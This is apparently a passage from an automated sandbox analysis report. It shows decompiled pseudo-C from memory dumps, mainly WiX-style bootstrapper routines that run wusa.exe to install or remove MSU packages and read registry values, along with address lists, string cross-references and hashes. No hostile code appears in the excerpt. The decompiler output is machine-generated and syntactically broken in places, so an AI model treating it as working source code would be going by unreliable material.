				_v8 = 0xffffffff;
				E100011A0( &_v58052);
			} else {
				E1000D1F0(_t265, _t353, _t354,  &_v43912, _a8, E10001A50(_a8, "=") - _a8);
				E1000D903(_a8,  &_v15704, 0x3710, E10001A50(_a8, "=") + 1);
				E1000CF80(_t353,  &_v58008, 0, 0x3710);
				E1000CF80(_t353,  &_v29808, 0, 0x3710);
				E1000CCA3(_t353,  &_v58008, _v15708,  &_v43912);
				_push( &_v15704);
				_push( &_v58008);
				_push(_a4);
				E1000CCA3(_t353,  &_v29808, _v29812, _v28);
				_t385 = _t366 + 0x64;
				if( *_a36 != 0) {
					E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, E1000CAD0( &_v29808));
					_t385 = _t385 + 0x10;
				}
				_t237 = E1000CAD0( &_v29808);
				_t357 = _t385 + 4;
				_v24 = _t237 + _v24;
			}
		}
	}
	_v20 = "\r\n%s%s%s\r\n";
	_v544 = 0;
	E1000CF80(_t353,  &_v543, 0, 0x1ff);
	_push(_v28);
	_push(_a4);
	E1000CCA3(_t353,  &_v544, _v20, _v28);
	_t359 = _t357 + 0x20;
	if( *_a36 != 0) {
		E1000D1F0(_t265, _t353, _t354,  *_a36 + _v24,  &_v544, E1000CAD0( &_v544));
		_t359 = _t359 + 0x10;
	}
	_v24 = E1000CAD0( &_v544) + _v24;
	 *[fs:0x0] = _v16;
	return _v24;
}


















































                                                                                                                                                                  0x10021930
                                                                                                                                                                  0x10021930
                                                                                                                                                                  0x10021822
                                                                                                                                                                  0x10021776
                                                                                                                                                                  0x10021b88
                                                                                                                                                                  0x10021b8f
                                                                                                                                                                  0x10021ba4
                                                                                                                                                                  0x10021baf
                                                                                                                                                                  0x10021bb3
                                                                                                                                                                  0x10021bc3
                                                                                                                                                                  0x10021bc8
                                                                                                                                                                  0x10021bd1
                                                                                                                                                                  0x10021bf3
                                                                                                                                                                  0x10021bf8
                                                                                                                                                                  0x10021bf8
                                                                                                                                                                  0x10021c0d
                                                                                                                                                                  0x10021c16
                                                                                                                                                                  0x10021c21

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_sprintf_strlen$_strcpy_s$__flsbuf__output_l
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 854390245-0
                                                                                                                                                                  • Opcode ID: 32f6cbe5084832234cf5b37318cbf1dc11104bf1af1b1b208e41874a49aca06a
                                                                                                                                                                  • Instruction ID: cf3fdb6315e205635e4887c8713e315fd67cdd6efcc5cedbeed1e245040bfa00
                                                                                                                                                                  • Opcode Fuzzy Hash: 32f6cbe5084832234cf5b37318cbf1dc11104bf1af1b1b208e41874a49aca06a
                                                                                                                                                                  • Instruction Fuzzy Hash: F50292B6D00208ABDB10DB54DC82FDE777CEB58244F444598F509A7285EB75BB88CFA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                                                  			E0041DB33(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _v8;
                                                                                                                                                                  				struct _SECURITY_ATTRIBUTES* _v12;
                                                                                                                                                                  				signed short _v16;
                                                                                                                                                                  				char _v20;
                                                                                                                                                                  				char _v24;
                                                                                                                                                                  				long _v28;
                                                                                                                                                                  				char _v32;
                                                                                                                                                                  				char _v36;
                                                                                                                                                                  				struct _PROCESS_INFORMATION _v52;
                                                                                                                                                                  				intOrPtr _v60;
                                                                                                                                                                  				intOrPtr _v64;
                                                                                                                                                                  				char _v68;
                                                                                                                                                                  				struct _STARTUPINFOW _v136;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed short _t95;
                                                                                                                                                                  				signed short _t97;
                                                                                                                                                                  				signed short _t100;
                                                                                                                                                                  				signed short _t101;
                                                                                                                                                                  				signed short _t102;
                                                                                                                                                                  				signed short _t109;
                                                                                                                                                                  				signed short _t112;
                                                                                                                                                                  				signed short _t114;
                                                                                                                                                                  				signed short _t128;
                                                                                                                                                                  				signed short _t131;
                                                                                                                                                                  				signed short _t136;
                                                                                                                                                                  				void* _t156;
                                                                                                                                                                  				signed short _t163;
                                                                                                                                                                  				long _t164;
                                                                                                                                                                  				signed short _t167;
                                                                                                                                                                  				signed short _t172;
                                                                                                                                                                  				void* _t178;
                                                                                                                                                                  				intOrPtr* _t181;
                                                                                                                                                                  				intOrPtr _t183;
                                                                                                                                                                  				void* _t186;
                                                                                                                                                                  				void* _t187;
                                                                                                                                                                  				void* _t188;
                                                                                                                                                                  
                                                                                                                                                                  				_t173 = __ecx;
                                                                                                                                                                  				_push(0x44);
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v136);
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v32 = 0;
                                                                                                                                                                  				_v36 = 0;
                                                                                                                                                                  				E004267C0(_t156, __ecx, _t178, 0, __eflags);
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_t187 = _t186 + 0xc;
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_t181 = _a20;
                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                  				 *_t181 = 0;
                                                                                                                                                                  				if(E00431D07(__ecx, _t181, 0x25,  &_v20) >= 0) {
                                                                                                                                                                  					_t95 = E004314A9(_v20, L"wusa.exe",  &_v12);
                                                                                                                                                                  					__eflags = _t95;
                                                                                                                                                                  					if(_t95 >= 0) {
                                                                                                                                                                  						_t183 = _a4;
                                                                                                                                                                  						_t97 =  *((intOrPtr*)(_t183 + 0x10)) - 1;
                                                                                                                                                                  						__eflags = _t97;
                                                                                                                                                                  						if(_t97 == 0) {
                                                                                                                                                                  							_push( *( *((intOrPtr*)(_t183 + 8)) + 0x94));
                                                                                                                                                                  							_t100 = E00433CEA( &_v8, L"\"%ls\" /uninstall /kb:%ls /quiet /norestart", _v12);
                                                                                                                                                                  							_t188 = _t187 + 0x10;
                                                                                                                                                                  							__eflags = _t100;
                                                                                                                                                                  							if(_t100 >= 0) {
                                                                                                                                                                  								goto L15;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push("Failed to format MSU uninstall command.");
                                                                                                                                                                  								goto L33;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							__eflags = _t97 == 1;
                                                                                                                                                                  							if(_t97 == 1) {
                                                                                                                                                                  								_t163 = E00413BE9(__ecx, _t181, 1,  *((intOrPtr*)( *((intOrPtr*)(_t183 + 8)) + 0x24)),  &_v24);
                                                                                                                                                                  								__eflags = _t163;
                                                                                                                                                                  								if(_t163 >= 0) {
                                                                                                                                                                  									_t163 = E004314A9(_v24,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t183 + 8)) + 0x7c)))) + 0x18)),  &_v16);
                                                                                                                                                                  									__eflags = _t163;
                                                                                                                                                                  									if(_t163 >= 0) {
                                                                                                                                                                  										_push(_v16);
                                                                                                                                                                  										_t163 = E00433CEA( &_v8, L"\"%ls\" \"%ls\" /quiet /norestart", _v12);
                                                                                                                                                                  										_t188 = _t187 + 0x10;
                                                                                                                                                                  										__eflags = _t163;
                                                                                                                                                                  										if(_t163 >= 0) {
                                                                                                                                                                  											L15:
                                                                                                                                                                  											_t101 =  *(_t183 + 0xc);
                                                                                                                                                                  											__eflags = _t101;
                                                                                                                                                                  											if(_t101 == 0) {
                                                                                                                                                                  												L21:
                                                                                                                                                                  												_t102 = _v16;
                                                                                                                                                                  												__eflags = _t102;
                                                                                                                                                                  												if(_t102 == 0) {
                                                                                                                                                                  													_t102 =  *( *((intOrPtr*)(_t183 + 8)) + 0x94);
                                                                                                                                                                  												}
                                                                                                                                                                  												_push(_v8);
                                                                                                                                                                  												_push(_t102);
                                                                                                                                                                  												_push(E0040E2BB( *((intOrPtr*)(_t183 + 0x10))));
												_push( *((intOrPtr*)( *((intOrPtr*)(_t183 + 8)))));
												E00402003(2, 0x2000012d, E0040E8FD(_a8));
												_t187 = _t188 + 0x1c;
												_t109 = E0041D8E0( &_v32,  &_v36);
												__eflags = _t109;
												if(_t109 >= 0) {
													_v136.cb = 0x44;
													_t112 = CreateProcessW(_v12, _v8, 0, 0, 0, 0x8000000, 0, 0,  &_v136,  &_v52);
													__eflags = _t112;
													if(_t112 != 0) {
														do {
															_v68 = 2;
															_v64 = 1;
															_v60 = 0x32;
															_t114 = _a12( &_v68, _a16);
															__eflags = _t114 - 1;
															if(_t114 == 1) {
																goto L29;
															} else {
																__eflags = _t114;
																if(_t114 != 0) {
																	__eflags = _t114 - 2;
																	_t163 = (0 | _t114 != 0x00000002) + 0x80070642;
																	E004300D9(_t114, "msuengine.cpp", 0x14d, _t163);
																	_push("Bootstrapper application aborted during MSU progress.");
																	goto L33;
																} else {
																	goto L29;
																}
															}
															goto L46;
															L29:
															_t163 = E00431FB6(_t173, _v52.hProcess, 0x1f4,  &_v28);
															__eflags = _t163 - 0x80070102;
														} while (_t163 == 0x80070102);
														__eflags = _t163;
														if(_t163 < 0) {
															_push(_v12);
															_push("Failed to wait for executable to complete: %ls");
															goto L45;
														} else {
															_t128 = GetExitCodeProcess(_v52.hProcess,  &_v28);
															__eflags = _t128;
															if(_t128 != 0) {
																_t164 = _v28;
																__eflags = _t164 - 0x80070bc2;
																_t163 =  ==  ? 0xbc2 : _t164;
																_v28 = _t163;
																__eflags = _t163;
																if(_t163 == 0) {
																	L43:
																	_t163 = 0;
																} else {
																	__eflags = _t163 - 1;
																	if(_t163 == 1) {
																		goto L43;
																	} else {
																		__eflags = _t163 - 0xbc2;
																		if(_t163 == 0xbc2) {
																			L42:
																			 *_t181 = 1;
																			goto L43;
																		} else {
																			__eflags = _t163 - 0x240005;
																			if(_t163 == 0x240005) {
																				goto L42;
																			} else {
																				__eflags = _t163 - 0x240006;
																				if(_t163 == 0x240006) {
																					goto L43;
																				} else {
																					__eflags = _t163 - 0x80240017;
																					if(_t163 == 0x80240017) {
																						goto L43;
																					} else {
																					}
																				}
																			}
																		}
																	}
																}
															} else {
																_t131 = GetLastError();
																__eflags = _t131;
																_t167 =  <=  ? _t131 : _t131 & 0x0000ffff | 0x80070000;
																__eflags = _t167;
																_t163 =  >=  ? 0x80004005 : _t167;
																E004300D9(0x80004005, "msuengine.cpp", 0x15a, _t163);
																_push("Failed to get process exit code.");
																goto L33;
															}
														}
													} else {
														_t136 = GetLastError();
														__eflags = _t136;
														_t172 =  <=  ? _t136 : _t136 & 0x0000ffff | 0x80070000;
														__eflags = _t172;
														_t163 =  >=  ? 0x80004005 : _t172;
														E004300D9(0x80004005, "msuengine.cpp", 0x143, _t163);
														_push(_v12);
														_push("Failed to CreateProcess on path: %ls");
														goto L45;
													}
												} else {
													_push("Failed to ensure WU service was enabled to install MSU package.");
													goto L33;
												}
											} else {
												_t173 = 0;
												__eflags =  *_t101;
												if( *_t101 == 0) {
													goto L21;
												} else {
													_t163 = E00433C35(0,  &_v8, L" /log:", 0);
													__eflags = _t163;
													if(_t163 >= 0) {
														_t163 = E00433C35(0,  &_v8,  *(_t183 + 0xc), 0);
														__eflags = _t163;
														if(_t163 >= 0) {
															goto L21;
														} else {
															_push("Failed to append log path to MSU command-line.");
															goto L33;
														}
													} else {
														_push("Failed to append log switch to MSU command-line.");
														goto L33;
													}
												}
											}
										} else {
											_push("Failed to format MSU install command.");
											goto L33;
										}
									} else {
										_push("Failed to build MSU path.");
										goto L33;
									}
								} else {
									_push( *((intOrPtr*)( *((intOrPtr*)(_t183 + 8)))));
									_push("Failed to get cached path for package: %ls");
									L45:
									_push(_t163);
									E00430A57();
								}
							} else {
								_t163 = 0x8000ffff;
								_push("Failed to get action arguments for MSU package.");
								goto L33;
							}
						}
					} else {
						_push("Failed to allocate WUSA.exe path.");
						goto L33;
					}
				} else {
					_push("Failed to find System32 directory.");
					L33:
					_push(_t163);
					E00430A57();
				}
				L46:
				if(_v24 != 0) {
					E004380AB(_v24);
				}
				if(_v16 != 0) {
					E004380AB(_v16);
				}
				if(_v20 != 0) {
					E004380AB(_v20);
				}
				if(_v12 != 0) {
					E004380AB(_v12);
				}
				if(_v8 != 0) {
					E004380AB(_v8);
				}
				if(_v52.hProcess != 0) {
					CloseHandle(_v52.hProcess);
					_v52.hProcess = _v52 & 0x00000000;
				}
				if(_v52.hThread != 0) {
					CloseHandle(_v52.hThread);
					_v52.hThread = _v52.hThread & 0x00000000;
				}
				if(_v36 != 0) {
					E0041DA76(_v32, 4);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t163;
                                                                                                                                                                  			}
                                                                                                                                                                  0x0041dc9b
                                                                                                                                                                  0x0041dc9d
                                                                                                                                                                  0x0041dc9f
                                                                                                                                                                  0x0041dcb9
                                                                                                                                                                  0x0041dcbb
                                                                                                                                                                  0x0041dcbd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041dcbf
                                                                                                                                                                  0x0041dcbf
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041dcbf
                                                                                                                                                                  0x0041dca1
                                                                                                                                                                  0x0041dca1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041dca1
                                                                                                                                                                  0x0041dc9f
                                                                                                                                                                  0x0041dc8a
                                                                                                                                                                  0x0041dc47
                                                                                                                                                                  0x0041dc47
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041dc47
                                                                                                                                                                  0x0041dc20
                                                                                                                                                                  0x0041dc20
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041dc20
                                                                                                                                                                  0x0041dbf4
                                                                                                                                                                  0x0041dbf7
                                                                                                                                                                  0x0041dbf9
                                                                                                                                                                  0x0041de93
                                                                                                                                                                  0x0041de93
                                                                                                                                                                  0x0041de94
                                                                                                                                                                  0x0041de99
                                                                                                                                                                  0x0041dbce
                                                                                                                                                                  0x0041dbce
                                                                                                                                                                  0x0041dbd3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041dbd3
                                                                                                                                                                  0x0041dbcc
                                                                                                                                                                  0x0041dbb4
                                                                                                                                                                  0x0041dbb4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041dbb4
                                                                                                                                                                  0x0041db93
                                                                                                                                                                  0x0041db93
                                                                                                                                                                  0x0041de19
                                                                                                                                                                  0x0041de19
                                                                                                                                                                  0x0041de1a
                                                                                                                                                                  0x0041de20
                                                                                                                                                                  0x0041de9c
                                                                                                                                                                  0x0041dea0
                                                                                                                                                                  0x0041dea5
                                                                                                                                                                  0x0041dea5
                                                                                                                                                                  0x0041deae
                                                                                                                                                                  0x0041deb3
                                                                                                                                                                  0x0041deb3
                                                                                                                                                                  0x0041debc
                                                                                                                                                                  0x0041dec1
                                                                                                                                                                  0x0041dec1
                                                                                                                                                                  0x0041deca
                                                                                                                                                                  0x0041decf
                                                                                                                                                                  0x0041decf
                                                                                                                                                                  0x0041ded8
                                                                                                                                                                  0x0041dedd
                                                                                                                                                                  0x0041dedd
                                                                                                                                                                  0x0041deec
                                                                                                                                                                  0x0041def1
                                                                                                                                                                  0x0041def3
                                                                                                                                                                  0x0041def3
                                                                                                                                                                  0x0041defb
                                                                                                                                                                  0x0041df00
                                                                                                                                                                  0x0041df02
                                                                                                                                                                  0x0041df02
                                                                                                                                                                  0x0041df0a
                                                                                                                                                                  0x0041df11
                                                                                                                                                                  0x0041df11
                                                                                                                                                                  0x0041df1c

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00431D07: SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00413C09,0000001C,00000000,00000000,?,?,0040A090), ref: 00431D27
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,wusa.exe,?,00000025,?), ref: 0041DEF1
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,wusa.exe,?,00000025,?), ref: 0041DF00
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to wait for executable to complete: %ls, xrefs: 0041DE8E
                                                                                                                                                                  • Failed to find System32 directory., xrefs: 0041DB93
                                                                                                                                                                  • Failed to get action arguments for MSU package., xrefs: 0041DBD3
                                                                                                                                                                  • Failed to get cached path for package: %ls, xrefs: 0041DBF9
                                                                                                                                                                  • Failed to format MSU install command., xrefs: 0041DC47
                                                                                                                                                                  • "%ls" "%ls" /quiet /norestart, xrefs: 0041DC33
                                                                                                                                                                  • Failed to build MSU path., xrefs: 0041DC20
                                                                                                                                                                  • Failed to format MSU uninstall command., xrefs: 0041DC74
                                                                                                                                                                  • Failed to allocate WUSA.exe path., xrefs: 0041DBB4
                                                                                                                                                                  • Failed to append log path to MSU command-line., xrefs: 0041DCBF
                                                                                                                                                                  • 2, xrefs: 0041DDA0
                                                                                                                                                                  • Failed to get process exit code., xrefs: 0041DE14
                                                                                                                                                                  • Failed to CreateProcess on path: %ls, xrefs: 0041DD82
                                                                                                                                                                  • /log:, xrefs: 0041DC8D
                                                                                                                                                                  • Failed to append log switch to MSU command-line., xrefs: 0041DCA1
                                                                                                                                                                  • Failed to ensure WU service was enabled to install MSU package., xrefs: 0041DD16
                                                                                                                                                                  • D, xrefs: 0041DD3A
                                                                                                                                                                  • "%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 0041DC60
                                                                                                                                                                  • msuengine.cpp, xrefs: 0041DD75, 0041DE0A, 0041DE37
                                                                                                                                                                  • Bootstrapper application aborted during MSU progress., xrefs: 0041DE41
                                                                                                                                                                  • wusa.exe, xrefs: 0041DBA1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$FolderPath
                                                                                                                                                                  • String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$msuengine.cpp$wusa.exe
                                                                                                                                                                  • API String ID: 964397404-2130913327
                                                                                                                                                                  • Opcode ID: 6aaf94fd5c13bb8d32033a64c2c76789d4455f13a110851a6b92ec045ce453d3
                                                                                                                                                                  • Instruction ID: ae37ea08d001c07eac2946c6669e57d9ba23b7271864dc9310eade8a562ed6d5
                                                                                                                                                                  • Opcode Fuzzy Hash: 6aaf94fd5c13bb8d32033a64c2c76789d4455f13a110851a6b92ec045ce453d3
                                                                                                                                                                  • Instruction Fuzzy Hash: C4B1BFB0E4071AABEB119FE5CC85BEF77B8AF18305F10002BF601A6151D7BD9994CB59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                                                  			E0040641E(long _a4, intOrPtr _a8) {
                                                                                                                                                                  				int _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				int _v16;
                                                                                                                                                                  				int _v20;
                                                                                                                                                                  				int _v24;
                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                  				WCHAR* _v40;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				signed short _t80;
                                                                                                                                                                  				signed short _t86;
                                                                                                                                                                  				void* _t88;
                                                                                                                                                                  				void* _t90;
                                                                                                                                                                  				void* _t104;
                                                                                                                                                                  				long _t107;
                                                                                                                                                                  				signed short _t111;
                                                                                                                                                                  				void* _t115;
                                                                                                                                                                  				WCHAR* _t132;
                                                                                                                                                                  				long _t140;
                                                                                                                                                                  				void* _t142;
                                                                                                                                                                  				void* _t144;
                                                                                                                                                                  				void* _t145;
                                                                                                                                                                  				void* _t155;
                                                                                                                                                                  
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_t140 = _a4;
                                                                                                                                                                  				_t73 =  !=  ? 0x101 : 1;
                                                                                                                                                                  				_a4 =  !=  ? 0x101 : 1;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_t132 = 0;
                                                                                                                                                                  				if(E00403A92(_a8,  *((intOrPtr*)(_t140 + 0x1c)),  &_v12, 0) >= 0) {
                                                                                                                                                                  					if( *((intOrPtr*)(_t140 + 0x20)) == 0) {
                                                                                                                                                                  						L5:
                                                                                                                                                                  						_t142 = E004324D5( *((intOrPtr*)(_t140 + 0x18)), _v12, _a4,  &_v20);
                                                                                                                                                                  						if(_t142 != 0x80070002) {
                                                                                                                                                                  							if(_t142 >= 0) {
                                                                                                                                                                  								_t80 = RegQueryValueExW(_v20, _v16, 0,  &_v24, 0,  &_v8);
                                                                                                                                                                  								if(_t80 != 2) {
                                                                                                                                                                  									if(_t80 == 0) {
                                                                                                                                                                  										_t132 = E00431078(_v8 + 2, 1);
                                                                                                                                                                  										if(_t132 != 0) {
                                                                                                                                                                  											_t86 = RegQueryValueExW(_v20, _v16, 0,  &_v24, _t132,  &_v8);
                                                                                                                                                                  											if(_t86 == 0) {
                                                                                                                                                                  												_t88 = _v24 - 1;
                                                                                                                                                                  												if(_t88 == 0) {
                                                                                                                                                                  													L38:
                                                                                                                                                                  													_t90 = E00418DBD(_t140,  &_v40, _t132, 0);
                                                                                                                                                                  													goto L39;
                                                                                                                                                                  												} else {
                                                                                                                                                                  													_t104 = _t88 - 1;
                                                                                                                                                                  													if(_t104 == 0) {
                                                                                                                                                                  														if( *((intOrPtr*)(_t140 + 0x28)) == 0) {
                                                                                                                                                                  															goto L38;
                                                                                                                                                                  														} else {
                                                                                                                                                                  															_t144 = E00433BDF( &_v40, _v8);
                                                                                                                                                                  															if(_t144 >= 0) {
                                                                                                                                                                  																_v32 = 2;
                                                                                                                                                                  																_t107 = ExpandEnvironmentStringsW(_t132, _v40, _v8);
                                                                                                                                                                  																_a4 = _t107;
                                                                                                                                                                  																if(_t107 <= _v8) {
                                                                                                                                                                  																	goto L40;
                                                                                                                                                                  																} else {
                                                                                                                                                                  																	_t145 = E00433BDF( &_v40, _t107);
                                                                                                                                                                  																	if(_t145 < 0) {
                                                                                                                                                                  																		goto L33;
                                                                                                                                                                  																	} else {
                                                                                                                                                                  																		if(_a4 == ExpandEnvironmentStringsW(_t132, _v40, _a4)) {
                                                                                                                                                                  																			goto L40;
                                                                                                                                                                  																		} else {
                                                                                                                                                                  																			_t111 = GetLastError();
                                                                                                                                                                  																			_t148 =  <=  ? _t111 : _t111 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  																			_t145 =  >=  ? 0x80004005 :  <=  ? _t111 : _t111 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  																			E004300D9(0x80004005, "search.cpp", 0x380, _t145);
                                                                                                                                                                  																			_push("Failed to get expand environment string.");
                                                                                                                                                                  																			goto L46;
                                                                                                                                                                  																		}
                                                                                                                                                                  																	}
                                                                                                                                                                  																}
                                                                                                                                                                  															} else {
                                                                                                                                                                  																L33:
                                                                                                                                                                  																_push("Failed to allocate string buffer.");
                                                                                                                                                                  																goto L46;
                                                                                                                                                                  															}
                                                                                                                                                                  														}
                                                                                                                                                                  													} else {
                                                                                                                                                                  														_t115 = _t104;
                                                                                                                                                                  														if(_t115 == 0) {
                                                                                                                                                                  															if(_v8 != 4) {
                                                                                                                                                                  																goto L26;
                                                                                                                                                                  															} else {
                                                                                                                                                                  																asm("cdq");
                                                                                                                                                                  																_push(0);
                                                                                                                                                                  																_push( *_t132);
                                                                                                                                                                  																goto L28;
                                                                                                                                                                  															}
                                                                                                                                                                  														} else {
                                                                                                                                                                  															if(_t115 == 7) {
                                                                                                                                                                  																if(_v8 == 8) {
                                                                                                                                                                  																	_push(_t132[2]);
                                                                                                                                                                  																	_push( *_t132);
                                                                                                                                                                  																	L28:
                                                                                                                                                                  																	_push( &_v40);
                                                                                                                                                                  																	_t90 = E00418D81();
                                                                                                                                                                  																	L39:
                                                                                                                                                                  																	_t144 = _t90;
                                                                                                                                                                  																	L40:
                                                                                                                                                                  																	if(_t144 >= 0) {
                                                                                                                                                                  																		_t145 = E00418B53( &_v40,  *((intOrPtr*)(_t140 + 0x14)));
                                                                                                                                                                  																		if(_t145 >= 0) {
                                                                                                                                                                  																			_t145 = E0040465B(_a8,  *((intOrPtr*)(_t140 + 4)),  &_v40, 0);
                                                                                                                                                                  																			if(_t145 < 0) {
                                                                                                                                                                  																				_push("Failed to set variable.");
                                                                                                                                                                  																				goto L46;
                                                                                                                                                                  																			}
                                                                                                                                                                  																		} else {
                                                                                                                                                                  																			_push("Failed to change value type.");
                                                                                                                                                                  																			goto L46;
                                                                                                                                                                  																		}
                                                                                                                                                                  																	} else {
                                                                                                                                                                  																		_push("Failed to read registry value.");
                                                                                                                                                                  																		goto L46;
                                                                                                                                                                  																	}
                                                                                                                                                                  																} else {
                                                                                                                                                                  																	L26:
                                                                                                                                                                  																	_t145 = 0x8000ffff;
                                                                                                                                                                  																	goto L47;
                                                                                                                                                                  																}
                                                                                                                                                                  															} else {
                                                                                                                                                                  																_t145 = 0x80004001;
                                                                                                                                                                  																E00430A57(0x80004001, "Unsupported registry key value type. Type = \'%u\'", _v24);
                                                                                                                                                                  																_t155 = _t155 + 0xc;
                                                                                                                                                                  																goto L47;
                                                                                                                                                                  															}
                                                                                                                                                                  														}
                                                                                                                                                                  													}
                                                                                                                                                                  												}
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_t151 =  <=  ? _t86 : _t86 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  												_t145 =  >=  ? 0x80004005 :  <=  ? _t86 : _t86 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  												E004300D9(0x80004005, "search.cpp", 0x35f, _t145);
                                                                                                                                                                  												_push("Failed to query registry key value.");
                                                                                                                                                                  												goto L46;
                                                                                                                                                                  											}
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t145 = 0x8007000e;
                                                                                                                                                                  											E004300D9(_t83, "search.cpp", 0x35c, 0x8007000e);
                                                                                                                                                                  											_push("Failed to allocate memory registry value.");
                                                                                                                                                                  											_push(0x8007000e);
                                                                                                                                                                  											E00430A57();
                                                                                                                                                                  											goto L47;
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t154 =  <=  ? _t80 : _t80 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										_t145 =  >=  ? 0x80004005 :  <=  ? _t80 : _t80 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  										E004300D9(0x80004005, "search.cpp", 0x359, _t145);
                                                                                                                                                                  										_push("Failed to query registry key value size.");
                                                                                                                                                                  										goto L46;
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_push(_v16);
                                                                                                                                                                  									E00430F28(_t80, "Registry value not found. Key = \'%ls\', Value = \'%ls\'", _v12);
                                                                                                                                                                  									_t155 = _t155 + 0x10;
                                                                                                                                                                  									goto L7;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push("Failed to open registry key.");
                                                                                                                                                                  								goto L46;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							E00430F28(2, "Registry key not found. Key = \'%ls\'", _v12);
                                                                                                                                                                  							_t155 = _t155 + 0xc;
